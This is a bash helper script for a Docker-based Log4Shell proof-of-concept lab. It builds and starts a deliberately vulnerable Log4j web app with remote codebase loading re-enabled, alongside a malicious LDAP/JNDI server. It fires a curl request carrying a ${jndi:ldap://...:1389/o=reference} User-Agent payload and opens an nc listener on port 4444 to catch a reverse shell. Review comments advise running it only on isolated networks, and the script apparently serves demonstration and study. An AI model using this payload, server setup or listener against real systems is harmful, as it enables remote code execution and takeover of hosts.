#!/usr/bin/env bash
# ANSI SGR escape sequences used for coloured terminal output.
# Written as raw bytes ($'...') so they can be embedded in plain echo/printf
# strings without -e. NC resets every attribute.
NC=$'\033[0m'        # No Color / reset
BOLD=$'\033[1m'
UNDERLINE=$'\033[4m'
RED=$'\033[31m'
GREEN=$'\033[32m'
BLUE=$'\033[34m'
ORANGE=$'\033[33m'   # SGR 33 is ANSI "yellow"
# Name used for both the POC docker image and the container started from it.
IMAGE="log4j-exploit-shell"
# Check Pre Conditions
#
# Verifies that an executable `docker` is on PATH. If not, prints an error and
# a download hint and exits the script with status 1. main() only calls this
# on the host, never inside the container.
function check_pre_conditions(){
    local docker_bin
    docker_bin="$(command -v docker)"
    if [ -x "$docker_bin" ]; then
        return 0
    fi
    echo 'Error: docker is not installed.' >&2
    echo 'Goto https://www.docker.com/products/docker-desktop'
    exit 1
}
# Raise Error
#
# Prints $1 in bold red on stderr and exits the script with status 1.
# The message goes through `echo -e`, so backslash escapes such as \n in it
# are interpreted (exploit() relies on this).
function raise_error(){
    local message="${BOLD}${RED}${1}${NC}"
    echo -e "$message" >&2
    exit 1
}
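# Workaround for Path Limitations in Windows
#
# Runs `docker "$@"`. On MSYS/Cygwin, MSYS path conversion is switched off
# (exported, so it also affects later docker calls from this shell) and, when
# the arguments request a TTY, the call is routed through winpty via xargs
# reading a NUL-separated argument file. On any other OS it is a plain call.
# Arguments: the docker command line
# Returns:   docker's exit status (winpty's on the Windows TTY path)
function _docker() {
    export MSYS_NO_PATHCONV=1
    export MSYS2_ARG_CONV_EXCL='*'
    local os realdocker argfile
    case "$OSTYPE" in
        *msys*|*cygwin*) os="$(uname -o)" ;;
        *) os="$(uname)" ;;
    esac
    if [[ "$os" == "Msys" || "$os" == "Cygwin" ]]; then
        # Pick the real docker binary, skipping this script if it is on PATH.
        # shellcheck disable=SC2230
        realdocker="$(which -a docker | grep -v "$(readlink -f "$0")" | head -1)"
        # Use a private, unpredictable temp file. The previous fixed
        # /tmp/args.txt could be swapped by another local user between the
        # write and the xargs read, letting them choose what winpty executes.
        if argfile="$(mktemp)"; then
            printf "%s\0" "$@" > "$argfile"
            # --tty or -t requires winpty.
            # NOTE(review): the file holds every argument on one NUL-joined
            # line, so the ^-anchored pattern effectively inspects only the
            # first argument — confirm this is the intended heuristic.
            if grep -qE '^--tty|^-[^-].*t|^-t.*' "$argfile"; then
                # Hand the paths over as positional parameters instead of
                # interpolating them into the -c string, so spaces or quotes
                # in them cannot alter the command.
                winpty /bin/bash -c 'xargs -0a "$1" "$2"' _ "$argfile" "$realdocker"
                local rc=$?
                rm -f -- "$argfile"
                return "$rc"
            fi
            rm -f -- "$argfile"
        fi
    fi
    docker "$@"
}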
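# Shell To POC Container
#
# Builds the image on first use, then runs the given command string with
# `bash -c` inside a fresh, auto-removed container named $IMAGE, publishing
# ports 8080 (vulnerable app), 1389 (LDAP/JNDI server) and 8888.
# stdin/tty are forwarded only when the caller actually has them.
# Arguments: $1 - command string executed by `bash -c` in the container
# Aborts via raise_error when already running inside the container or when
# the image cannot be built.
function wrapper_runner(){
    [ "$OS_ENV" != "container" ] || raise_error "Can Not Execute Inside Container"
    # Only allocate stdin/tty if one is detected. See - https://stackoverflow.com/questions/911168
    local -a IT=()
    [[ -t 0 ]] && IT+=(-i)
    [[ -t 1 ]] && IT+=(-t)
    # Exact image lookup instead of grepping `docker images` (which also
    # matched substrings and miscounted when several tags existed).
    if ! docker image inspect "$IMAGE" >/dev/null 2>&1; then
        docker build -t "$IMAGE" . || raise_error "Failed to build image $IMAGE"
    fi
    # NOTE(review): the -p mappings bind on every host interface, so the
    # deliberately vulnerable app and the malicious LDAP server are reachable
    # from the whole LAN while the lab runs. Use it only on an isolated network.
    _docker run --rm "${IT[@]}" \
        -e OS_ENV=container \
        -p 8080:8080 \
        -p 8888:8888 \
        -p 1389:1389 \
        --workdir /apps \
        --name "$IMAGE" \
        "$IMAGE" bash -c "$@"
}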
# Start Apps
#
# Host-side entry point: brings the POC container up and, inside it, starts
# the apps and then follows their log output.
function poc(){
    local inner_cmd="./assist.sh start && ./assist.sh logs"
    wrapper_runner "$inner_cmd"
}
# Shell to POC Container
#
# Listens on TCP 4444 and attaches the terminal to the first inbound
# connection — the reverse shell launched from the POC. The listener is
# unauthenticated and nc binds every interface by default, so anything able to
# reach port 4444 gets this session; run it only on an isolated network.
# Uses BSD-style `nc -l <port>`; traditional netcat needs `-p` for the port.
function reverse_shell(){
    local listen_port=4444
    printf '%s\n' "${RED}Awaiting For Reverse Shell Injection${NC}"
    nc -lvn "$listen_port"
}
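# Cat the Injected File from POC Container
#
# Prints /tmp/attacked.txt from the running $IMAGE container (presumably the
# marker written by the injected payload — see the jndi-exploit module).
# Defined once; the script previously carried two identical copies.
function view_exploit(){
    docker exec "$IMAGE" cat /tmp/attacked.txt
}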
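# Build Java Apps
#
# Builds the fat jars of both Maven modules (the vulnerable app and the
# JNDI/LDAP server). Both builds are attempted even if the first fails.
# Returns: 0 only when both builds succeeded (previously the first build's
#          failure was masked by the second one's status)
function build(){
    local rc=0
    mvn -f log4j-exploit/pom.xml clean compile assembly:single || rc=1
    mvn -f jndi-exploit/pom.xml clean compile assembly:single || rc=1
    return "$rc"
}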
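# Start Apps
#
# Launches, in the background, the vulnerable Log4j web app and the malicious
# LDAP/JNDI server; both append stdout/stderr to /tmp/out.txt (see logs()).
# -Dcom.sun.jndi.ldap.object.trustURLCodebase=true deliberately re-enables
# loading classes from a remote LDAP codebase, which current JDKs disable by
# default — it is what makes this lab exploitable and must never be set on a
# real service.
# Aborts via raise_error when a jar is missing (run `./assist.sh build` first)
# instead of backgrounding a java process that dies immediately.
function start(){
    local log_file="/tmp/out.txt"
    local app_jar="log4j-exploit/target/log4j-exploit-1.0-SNAPSHOT-jar-with-dependencies.jar"
    local ldap_jar="jndi-exploit/target/jndi-exploit-1.0-SNAPSHOT-jar-with-dependencies.jar"
    [ -f "$app_jar" ] || raise_error "Missing $app_jar - run ./assist.sh build first"
    [ -f "$ldap_jar" ] || raise_error "Missing $ldap_jar - run ./assist.sh build first"
    nohup java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true \
        -jar "$app_jar" >> "$log_file" 2>&1 &
    echo -e "Log4j Vulnerable Apps Done"
    nohup java -jar "$ldap_jar" >> "$log_file" 2>&1 &
    echo -e "Malicious LDAP server for JNDI injection Attacks - Done"
}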
# Tail Logs
#
# Follows /tmp/out.txt, the combined output of the apps started by start().
# Returns 1 without output when the file does not exist.
function logs(){
    local log_file="/tmp/out.txt"
    if [ ! -f "$log_file" ]; then
        return 1
    fi
    tail -f "$log_file"
}
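# Stop Apps
#
# Terminates whatever lsof reports listening on the app ports (8080: vulnerable
# app, 1389: LDAP server). Each pid gets SIGTERM first and SIGKILL only if it
# is still alive about a second later. lsof may list several pids, one per
# line; they are handled individually (a single quoted blob made kill fail).
# A missing lsof or nothing listening is a no-op.
# Returns: 0
function stop(){
    local port pids pid attempt
    for port in 8080 1389; do
        pids="$(lsof -t -i:"$port" 2>/dev/null)"
        [ -n "$pids" ] || continue
        # Word-splitting on the newline-separated pid list is intended.
        # shellcheck disable=SC2086
        for pid in $pids; do
            kill -TERM "$pid" 2>/dev/null || continue
            for attempt in 1 2 3 4 5 6 7 8 9 10; do
                kill -0 "$pid" 2>/dev/null || break
                sleep 0.1
            done
            if kill -0 "$pid" 2>/dev/null; then
                kill -9 "$pid" 2>/dev/null
            fi
        done
    done
    return 0
}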
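# Stop Apps and Clean Logs
#
# Removes the POC image. A container left over from `poc` carries the same
# name and would make `docker rmi` fail, so it is force-removed first (errors
# ignored when there is none). Then deletes ./out.txt.
# NOTE(review): start() writes its log to /tmp/out.txt, not ./out.txt; only
# the cwd file the original targeted is removed here — confirm which was meant.
function clean(){
    echo -e "Deleting $IMAGE "
    docker rm -f "$IMAGE" >/dev/null 2>&1
    docker rmi "$IMAGE"
    # out.txt is a plain file; no recursive delete needed.
    rm -f -- out.txt
}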
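# Exploit Vulnerability
#
# Sends one HTTP request to the vulnerable app with a JNDI lookup string in the
# User-Agent header that points at the malicious LDAP server on port 1389.
# The target address is the jndi-exploit container's IP when such a container
# exists, otherwise the host's 192.168.1.x interface address.
# Aborts via raise_error when the POC container is not running or when no
# target address could be determined (the old code then curled ":8080").
function exploit(){
    local host_ip id ua
    # Running containers only (`ps -a` also counted exited ones), exact name.
    if ! docker ps --format '{{.Names}}' | grep -qxF "$IMAGE"; then
        raise_error "$IMAGE not Running.\n${NC}${GREEN}Run -> ./assist.sh poc ${NC}"
    fi
    # NOTE(review): the 192.168.1 prefix is hard-coded; on any other subnet this
    # yields nothing and the jndi-exploit container path below is the only one
    # that works. Only the first matching address is used.
    host_ip="$(ifconfig 2>/dev/null | grep "inet " | grep "192.168.1" | grep -Fv 127.0.0.1 | awk '{print $2}' | head -n 1)"
    id="$(docker ps -a | grep jndi-exploit | awk '{print $1}' | head -n 1)"
    if [ -n "$id" ]; then
        echo "jndi-exploit container is $id"
        host_ip="$(docker inspect --format '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' "$id")"
    fi
    [ -n "$host_ip" ] || raise_error "Could not determine a target address (no 192.168.1.x interface and no jndi-exploit container)"
    ua="User-Agent: \${jndi:ldap://$host_ip:1389/o=reference}"
    # Echo the exact request, shell-quoted so it can be pasted back verbatim.
    printf 'curl -v -H %q %q\n' "$ua" "$host_ip:8080"
    curl -v -H "$ua" "$host_ip:8080"
}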
# Help
#
# Prints the usage line on stderr and the command list on stdout. The host
# shows the docker-side commands; inside the container (OS_ENV=container) the
# in-container ones. Always returns 1 so unknown commands fail.
function help(){
    local usage
    local -a lines
    if [ "$OS_ENV" != "container" ]; then
        usage="${RED}Usage: $0 { poc | exploit | view | shell }${NC}"
        lines=(
            " ${ORANGE}poc -> Start Vulnerable App, Malicious JNDI Server ${NC}"
            " ${ORANGE}exploit -> Simulate Exploit ${NC}"
            " ${ORANGE}view -> View Exploit in POC Container ${NC}"
            " ${ORANGE}shell -> Reverse Shell To POC Container ${NC}"
        )
    else
        usage="${RED}Usage: $0 { start | logs | stop }${NC}"
        lines=(
            " ${ORANGE}start -> Start the Vulnerable App and Malicious JNDI Server ${NC}"
            " ${ORANGE}logs -> View Logs ${NC}"
            " ${ORANGE}stop -> Stop the Apps ${NC}"
        )
    fi
    echo -e "$usage" >&2
    echo
    printf '%s\n' "${lines[@]}"
    echo
    return 1
}
# Entry point: lower-cases the first argument and dispatches to the matching
# sub-command; anything else prints help. The docker pre-check runs on the
# host only, not inside the container.
function main(){
    local opt="$1"
    local choice
    if [ "$OS_ENV" != "container" ]; then
        check_pre_conditions
    fi
    choice="$(tr '[:upper:]' '[:lower:]' <<<"$opt")"
    case "$choice" in
        shell)   reverse_shell ;;
        poc)     poc ;;
        build)   build ;;
        start)   start ;;
        logs)    logs ;;
        exploit) exploit ;;
        view)    view_exploit ;;
        stop)    stop ;;
        clean)   clean ;;
        *)       help ;;
    esac
}
main "$@"